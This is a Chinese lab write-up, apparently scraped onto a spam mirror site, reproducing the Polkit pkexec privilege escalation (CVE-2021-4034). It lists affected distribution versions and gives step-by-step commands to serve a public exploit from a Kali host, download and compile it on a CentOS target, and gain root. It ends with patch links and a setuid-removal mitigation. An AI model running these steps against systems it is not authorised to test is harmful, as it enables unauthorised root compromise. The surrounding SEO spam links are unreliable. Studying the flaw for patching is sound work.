当前位置: 首页 > news >正文

中国老区建设促进会网站一键识图找原图

中国老区建设促进会网站,一键识图找原图,国际域名查询网站,iis7 网站 目录Linux-Poolkit提权 漏洞复现- Linux Polkit 权限提升漏洞(CVE-2021-4034) 0x00 前言 polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo&#x…

Linux-Poolkit提权

漏洞复现- Linux Polkit 权限提升漏洞(CVE-2021-4034)

0x00 前言

polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo,允许用户以另一个用户身份执行命令

利用版本

Ubuntu 21.10 (Impish Indri) policykit-1 < 0.105-31ubuntu0.1

Ubuntu 21.04 (Hirsute Hippo) policykit-1 Ignored (reached end-of-life)

Ubuntu 20.04 LTS (Focal Fossa) policykit-1 < Released (0.105-26ubuntu1.2)

Ubuntu 18.04 LTS (Bionic Beaver) policykit-1 < Released (0.105-20ubuntu0.18.04.6)

Ubuntu 16.04 ESM (Xenial Xerus) policykit-1 < Released (0.105-14.1ubuntu0.5+esm1)

Ubuntu 14.04 ESM (Trusty Tahr) policykit-1 < Released (0.105-4ubuntu3.14.04.6+esm1)

CentOS 6 polkit < polkit-0.96-11.el6_10.2

CentOS 7 polkit < polkit-0.112-26.el7_9.1

CentOS 8.0 polkit < polkit-0.115-13.el8_5.1

CentOS 8.2 polkit < polkit-0.115-11.el8_2.2

CentOS 8.4 polkit < polkit-0.115-11.el8_4.2

Debain stretch policykit-1 < 0.105-18+deb9u2

Debain buster policykit-1 < 0.105-25+deb10u1

Debain bookworm, bullseye policykit-1 < 0.105-31.1

uname -a查看内核版本

攻击者靶机
操作系统kaliCentOS 7
IP地址192.168.12.135192.168.12.131
内核5.8.7

这里使用普通用户登录靶机,进行提权,前期入侵操作默认完成

0x01 获取POC代码

https://gitee.com/buxiaomo/CVE-2021-4034

将文件存入/tmp目录下,开启web服务

cd /tmppython -m http.server 8080

0x02 在靶机运行poc代码

如果靶机没有unzip,可以重新使用tar压缩归档

# 获取漏洞利用工具,此处在kali上使用python开启web服务器,并让被攻击主机下载提权工具源码。
wget http://192.168.12.135:8080/CVE-2021-4034-main.zip# 解压,编译,安装。
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make		# 进行提权。
./cve-2021-4034# 查看
whoami
# 是root就成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NiINF2A8-1677339687182)(Linux-Poolkit提权.assets/image-20230225180312545.png)]

0x03 修复方法

1、更新官方补丁,下载地址:https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683

2、根据不同厂商的修复建议或安全通告进行防护。

Redhat:https://access.redhat.com/security/cve/CVE-2021-4034

Ubuntu:https://ubuntu.com/security/CVE-2021-4034

Debian:https://security-tracker.debian.org/tracker/CVE-2021-4034

3、临时防护可以移除 pkexec 的 suid位。

 chmod 0755 /usr/bin/pkexec
http://www.hotlads.com/news/3887.html

相关文章:

  • 公司官方网站建设申请广州关键词排名推广
  • 深圳市网站建设公司设计百度竞价推广是什么
  • 国外的服务器建设的网站app开发制作
  • 椒江网站建设公司百度扫一扫网页版
  • 如何创建百度网站seo服务外包公司
  • 广州做企业网站找哪家公司好网站标题算关键词优化吗
  • 代做效果图网站好北京seo教师
  • 沂南网站建设打开百度搜索引擎
  • 某颜值女主播低俗内容流出视频恩城seo的网站
  • 做调查挣钱的网站站长推荐黄色
  • 做任务的网站有那些搜索引擎查重
  • 石家庄建设网站公司哪家好广州做seo公司
  • 做教育类网站拉新推广平台
  • 怎么制作钓鱼网站下载百度推广app
  • 政府蒙古文网站建设汇报推广公司属于什么公司
  • 织梦分类信息做的网站百度关键字优化精灵
  • 伪静态网站网站 目录写入权限电商网站开发需要多少钱
  • 美女做暖暖免费视频网站推广拉新任务的平台
  • 厦门网站开发公司自己的网站怎么做seo
  • 郑州专业做网站汕头seo全网营销
  • 网站开发使用软件环境国际婚恋网站排名
  • 顺德网站制作公司网络优化培训骗局
  • 武汉做个网站多少钱网络运营策划
  • 漳州本地企业网站建设服务网站宣传推广策划
  • 山东聊城建设学校网站好的seo平台
  • 公司网站建站广东疫情最新数据
  • html编程搜索引擎优化的主要内容
  • 北京网页设计公司网站优化排名资源
  • 网站模版自适应福州百度推广排名优化
  • cp网站开发是什么佛山网站开发公司